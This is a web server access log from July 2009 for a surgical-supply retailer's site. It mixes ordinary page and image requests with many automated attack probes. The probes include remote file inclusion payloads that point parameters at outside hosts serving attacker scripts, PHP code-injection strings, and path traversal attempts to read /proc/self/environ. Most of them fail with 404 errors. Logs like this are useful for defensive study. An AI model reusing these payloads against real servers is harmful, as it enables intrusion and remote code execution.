81.37.45.32 - - [15/Jul/2009:06:20:12 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:12 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
209.59.12.99 - - [15/Jul/2009:06:20:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.37.45.32 - - [15/Jul/2009:06:20:33 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:34 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:34 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:34 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:34 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:34 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:35 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:36 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:36 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:36 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:36 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:37 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:38 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:38 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:38 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:38 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:38 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:47 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:52 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
81.37.45.32 - - [15/Jul/2009:06:20:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
204.30.3.225 - - [15/Jul/2009:06:21:05 -0400] "GET /logs/access_log.Q109070300%20%20//[path]/dm-albums/template/album.php?SECURITY_FILE=http://aboutav.com//id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
62.113.86.17 - - [15/Jul/2009:06:21:22 -0400] "GET /errors.php?error=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:21:46 -0400] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:21:46 -0400] "GET /logs/error_log.Q109051300/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:21:46 -0400] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:21:46 -0400] "GET /logs/access_log.Q109051300/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
82.194.87.219 - - [15/Jul/2009:06:23:11 -0400] "GET /logs//forum.php?act=http://webmaster-100.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
62.113.86.17 - - [15/Jul/2009:06:23:17 -0400] "GET /logs/access_log.Q109051800/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
62.113.86.17 - - [15/Jul/2009:06:23:17 -0400] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
62.113.86.17 - - [15/Jul/2009:06:23:17 -0400] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
220.231.126.252 - - [15/Jul/2009:06:23:32 -0400] "GET /logs/access_log.Q109060400%20%20/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 343 "-" "Mozilla/5.0"
82.194.87.219 - - [15/Jul/2009:06:23:44 -0400] "GET /logs//forum.php?act=http://webmaster-100.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.822"
66.249.68.247 - - [15/Jul/2009:06:24:01 -0400] "GET /images/store_xray_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
211.236.242.164 - - [15/Jul/2009:06:24:49 -0400] "GET //modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:24:49 -0400] "GET /logs//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:24:50 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:24:54 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.23.36.15 - - [15/Jul/2009:06:24:56 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:06:24:56 -0400] "GET /logs/show.php?path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
94.23.36.15 - - [15/Jul/2009:06:24:56 -0400] "GET /show.php?path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
211.236.242.164 - - [15/Jul/2009:06:24:56 -0400] "GET /logs/access_log.Q109062100//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/access_log.Q109052100/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 211 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/access_log.Q109052100/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 211 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /logs/access_log.Q109052100/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:24:57 -0400] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 206 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:24:59 -0400] "GET /show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 206 "-" "XXXXXX"
209.59.12.99 - - [15/Jul/2009:06:25:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.230.156.161 - - [15/Jul/2009:06:26:21 -0400] "GET /logs/access_log.Q109070300//[path]/dm-albums/template/album.php?SECURITY_FILE=http://aboutav.com//id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:26:39 -0400] "GET //administrator/components/com_clickheat/Recly_Config.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:26:39 -0400] "GET /logs//administrator/components/com_clickheat/Recly_Config.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:26:39 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_clickheat/Recly_Config.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.236.242.164 - - [15/Jul/2009:06:27:31 -0400] "GET /logs/access_log.Q109051500//administrator/components/com_clickheat/Recly_Config.php?mosConfig_absolute_path=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:27:31 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:27:31 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:27:31 -0400] "GET /logs/access_log.Q109052000%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:06:28:21 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
123.143.98.5 - - [15/Jul/2009:06:28:30 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.fileden.com/files/2008/10/20/2151409/1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:30:04 -0400] "GET /logs/access_log.Q109052000//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:06:30:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [15/Jul/2009:06:30:42 -0400] "GET /logs/access_log.Q109070300//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
202.125.45.45 - - [15/Jul/2009:06:30:52 -0400] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:30:52 -0400] "GET /logs/access_log.Q109060400/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:06:30:52 -0400] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
94.23.36.15 - - [15/Jul/2009:06:31:01 -0400] "GET /logs/error_log.Q109060300/show.php?path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
94.23.36.15 - - [15/Jul/2009:06:31:01 -0400] "GET /logs/error_log.Q109060300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
94.23.36.15 - - [15/Jul/2009:06:31:01 -0400] "GET /logs/error_log.Q109060300/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
94.23.36.15 - - [15/Jul/2009:06:31:02 -0400] "GET /logs/error_log.Q109060300/show.php?path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
201.232.54.48 - - [15/Jul/2009:06:32:05 -0400] "GET /logs/access_log.Q109052000%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:32:05 -0400] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:32:05 -0400] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:06:33:46 -0400] "GET /logs/access_log.Q109052000//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:06:34:02 -0400] "GET /logs/error_log.Q109062400 HTTP/1.0" 200 2057400 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.21.72.237 - - [15/Jul/2009:06:34:12 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.21.72.237 - - [15/Jul/2009:06:34:12 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
